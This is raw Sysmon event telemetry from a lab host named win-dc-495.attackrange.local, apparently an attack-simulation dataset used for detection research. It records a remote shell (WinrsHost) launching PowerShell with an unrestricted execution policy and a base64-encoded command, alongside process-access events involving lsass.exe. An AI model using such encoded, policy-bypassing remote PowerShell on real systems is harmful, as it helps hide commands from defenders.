13:33:21.013{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8E21-6005-D402-00000000A201}12844668C:\Windows\system32\cmd.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.015{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8E20-6005-D202-00000000A201}2340740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.009{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
22542200x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.256{59A5CD1D-8E21-6005-D502-00000000A201}4220localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.027{59A5CD1D-8E15-6005-B802-00000000A201}4560f.f.f.f.f.b.1.0.b.2.e.3.0.5.8.c.0.0.0.0.0.0.0.0.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.824{59A5CD1D-8E15-6005-B802-00000000A201}45605.8.f.0.0.c.5.8.0.0.0.0.4.5.4.d.5.1.f.f.0.2.4.2.c.f.0.0.0.0.0.e.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.809{59A5CD1D-8E15-6005-B802-00000000A201}45603.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.310{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.310{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
